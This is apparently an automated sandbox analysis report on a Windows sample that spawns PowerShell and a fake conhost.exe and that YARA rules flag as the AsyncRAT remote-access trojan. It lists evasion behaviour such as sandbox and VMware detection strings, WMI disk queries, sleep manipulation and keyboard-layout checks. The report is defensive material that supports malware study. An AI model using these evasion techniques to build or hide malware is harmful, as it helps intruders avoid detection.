Source: C:\Users\user\Desktop\xuXIetZvv6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\xuXIetZvv6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\xuXIetZvv6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\xuXIetZvv6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\xuXIetZvv6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\xuXIetZvv6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\xuXIetZvv6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\xuXIetZvv6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\xuXIetZvv6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\conhost.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AsyncRAT

Show sources

Source: Yara match	File source: 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.504520772.000001339CFF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.272338570.0000013386CFC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6920, type: MEMORY
Source: Yara match	File source: 14.2.powershell.exe.13385685750.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.powershell.exe.1339cff0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.powershell.exe.1339cff0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.powershell.exe.13385685750.3.unpack, type: UNPACKEDPE

Contains functionality to detect sleep reduction / modifications

Show sources

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe

Code function: 3_2_0000000140018A20

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Show sources

Source: C:\ProgramData\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\ProgramData\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\ProgramData\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\ProgramData\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\ProgramData\conhost.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\xuXIetZvv6.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1335
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7405
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1197

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe

Code function: 3_2_0000000140018A20

Source: C:\Users\user\Desktop\xuXIetZvv6.exe TID: 6484	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7056	Thread sleep count: 1335 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7024	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5776	Thread sleep time: -11068046444225724s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_000000014001A400 GetKeyboardLayout followed by cmp: cmp dl, 00000019h and CTI: ja 000000014001A57Dh country: Russian (ru)
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400226B7 GetKeyboardLayout followed by cmp: cmp ax, 0020h and CTI: je 00000001400228E9h country: Urdu (ur)
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400226B7 GetKeyboardLayout followed by cmp: cmp eax, 5dh and CTI: ja 00000001400228E9h country: Inuktitut (iu)
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400226BF GetKeyboardLayout followed by cmp: cmp ax, 0020h and CTI: je 00000001400228E9h country: Urdu (ur)
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400226BF GetKeyboardLayout followed by cmp: cmp eax, 5dh and CTI: ja 00000001400228E9h country: Inuktitut (iu)
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400226C6 GetKeyboardLayout followed by cmp: cmp ax, 0020h and CTI: je 00000001400228E9h country: Urdu (ur)
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400226C6 GetKeyboardLayout followed by cmp: cmp eax, 5dh and CTI: ja 00000001400228E9h country: Inuktitut (iu)
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400226ED GetKeyboardLayout followed by cmp: cmp ax, 0020h and CTI: je 00000001400228E9h country: Urdu (ur)
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_00000001400226ED GetKeyboardLayout followed by cmp: cmp eax, 5dh and CTI: ja 00000001400228E9h country: Inuktitut (iu)
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140022711 GetKeyboardLayout followed by cmp: cmp ax, 0020h and CTI: je 00000001400228E9h country: Urdu (ur)
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140022711 GetKeyboardLayout followed by cmp: cmp eax, 5dh and CTI: ja 00000001400228E9h country: Inuktitut (iu)
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140022735 GetKeyboardLayout followed by cmp: cmp ax, 0020h and CTI: je 00000001400228E9h country: Urdu (ur)
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140022735 GetKeyboardLayout followed by cmp: cmp eax, 5dh and CTI: ja 00000001400228E9h country: Inuktitut (iu)
Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140014BA0 GetKeyboardLayout followed by cmp: cmp ecx, 0ah and CTI: jl 0000000140014F02h country: Spanish (es)

Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe	Code function: 3_2_0000000140058D70 GetLocalTime followed by cmp: cmp word ptr [rbx], cx and CTI: je 00000001400590A3h
